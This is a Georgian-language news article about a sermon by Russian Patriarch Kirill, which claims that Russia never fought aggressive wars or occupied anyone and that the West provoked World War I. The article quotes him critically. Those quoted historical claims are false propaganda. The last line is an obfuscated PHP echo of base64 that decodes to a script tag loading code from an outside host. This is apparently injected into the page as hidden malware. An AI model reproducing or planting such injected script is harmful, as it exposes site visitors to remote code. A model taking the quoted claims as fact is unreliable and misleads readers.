celsiusi
ავერსი საქკაბელი
რუსეთის პატრიარქის კირილის თქმით, რუსეთს აგრესიული ომები არასოდეს უწარმოებია და არასდროს უცდია რომელიმე ქვეყნის ან ტერიტორიის ოკუპაცია, – ამის შესახებ რუსეთის პატრიარქმა, თავის ქადაგებაში ისაუბრა.
 
მისივე მტკიცებით, რუსეთი ყოველთვის თავს სწირავდა სხვების დასახმარებლად. დასავლეთს კი არ სურდა რუსეთის მოყვარული ეს მამაცი მართლმადიდებელი ხალხი თავის ხალხებში ყოფილიყო და პირველი მსოფლიო ომის პროვოცირება მოახდინა 
 
"და პირველი მსოფლიო ომი? დასავლური ძალების მთავარი მიზანი და სამიზნე სერბები გახდნენ. და ეს ცნობილი პროვოკაცია სარაევოში - ყველაფერი იმისთვის იყო მიმართული, რომ სერბეთმა, სულით რუსეთთან ახლოს მყოფმა, მაგრამ დასავლეთის ქვეყნებით გარემოცულმა მართლმადიდებლურმა ქვეყანამ არსებობა შეწყვიტოს. დასავლეთს არ სურდა რუსეთის მოყვარული ეს მამაცი მართლმადიდებელი ხალხი თავის ხალხებში ყოფილიყო და პირველი მსოფლიო ომის პროვოცირება მოახდინა. და რუსეთი ამ ომში შევიდა არა იმისთვის, რომ მოეპოვებინა მიწა თავისთვის, არა იმისთვის, რომ გამდიდრებულიყო, არა იმისთვის, რომ მოეპოვებინა ძალაუფლება სხვებზე, არამედ იმისთვის, რომ გადაერჩინა მოძმე სერბი ხალხი.
 
რუსეთი თავს სწირავდა სხვების დასახმარებლად. ამიტომ ჩვენ ვეძახით ჩვენს ჯარს ქრისტესმოყვარეს - რადგან რა ძალას შეუძლია, გარდა შინაგანი სულიერი სიძლიერისა, ახსნას ჩვენი ჯარისკაცების დიდი ღვაწლი იმ ორ ომში!...
 
და რა მოხდა დიდი სამამულო ომის დროს? საშინელი მტერი თავს დაესხა ქვეყანას, რომელსაც არ გაუვლია თავისი ისტორიის საუკეთესო პერიოდი - 20-30-იანი წლები. თითოეულმა ჩვენგანმა, ვინც ისტორიას სწავლობს, იცის, რამდენად რთული და საშინელიც კი იყო ეს წლები ხალხისთვის. მაგრამ შემდეგ ომი მოვიდა და ყველა შეურაცხყოფა დავიწყებას მიეცა, ყველა რეპრესირებული მზად იყო წასულიყო და დაეცვა სამშობლო. და რამდენი ადამიანი, რომელსაც მანამდე ხელისუფლება თვლიდა ხალხის მტრად, გახდა სამშობლოს მგზნებარე დამცველი! საიდან მოდის ეს ყველაფერი? - ჩვენი სულიერი ფესვებიდან, ჩვენი ეროვნული იდენტობიდან, ჩვენი ხალხის სულიერი ღირებულებებიდან. და უღმერთო დროშიც კი არ შეიძლებოდა ამ ფასეულობების განადგურება, რადგან ისინი გახდნენ ცხოვრების ნაწილი, ჩვენი ხალხის სულის ნაწილი.
 
და დღეს, ამ სამხედრო ტაძარში, ჩვენ პატივს მივაგებთ ყველას, ვინც ახლა იცავს ჩვენს სამშობლოს სხვადასხვა საზღვრებზე. ჩვენ გვჯერა, რომ ჩვენს ჯარს დღესაც სჭირდება სულიერი ძალა, თანადგომა და რაც მთავარია, მთელი ჩვენი ხალხის ლოცვა, არანაკლებ იმ დროისა, რაც მე გავიხსენე. ჯარს კი უნდა ახსოვდეს, რომ ჩვენ გვიყვარს, გვახსოვს და ვლოცულობთ მათთვის, ვინც დღეს იცავს ჩვენს სამშობლოს" - თქვა რუსების პატრიარქმა.
 
ოკუპანტი ქვეყნის პატრიარქი დარწმუნებულია, რომ რუსეთი ზიანს არავის აყენებს, არავის იპყრობს, როგორც ამას მსოფლიოს მდიდარი ქვეყნების უმეტესობა აკეთებს.
 
"რუსეთი არავის ცუდს არ უსურვებს, არ სურს ვინმეს ხელში ჩაგდება და ოკუპაცია, არ სურს რესურსების მიღება ვინმესგან, როგორც ამას აკეთებს მსოფლიოს მდიდარი და ძლიერი ქვეყნების უმეტესობა, ეკონომიკურად იკავებს სუსტ და უმწეო ქვეყნებს. ჩვენ არ გვჭირდება ეს ყველაფერი, ჩვენ ვართ თვითკმარი, მაგრამ გვჭირდება მხოლოდ ერთი რამ - ჩვენი ჭეშმარიტი თავისუფლება, დამოუკიდებლობა ძალაუფლების ამ მსოფლიო ცენტრებისგან, რომლებიც დღეს, სამწუხაროდ, მტრულად არიან რუსეთის მიმართ განწყობილი. ჩვენ უნდა გავაერთიანოთ ჩვენი სულიერი და მატერიალური ძალები, რათა ვერავინ გაბედოს ჩვენი სამშობლოს წმინდა საზღვრების ხელყოფა." – განაცხადა კირილმა. 
 
 
667
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");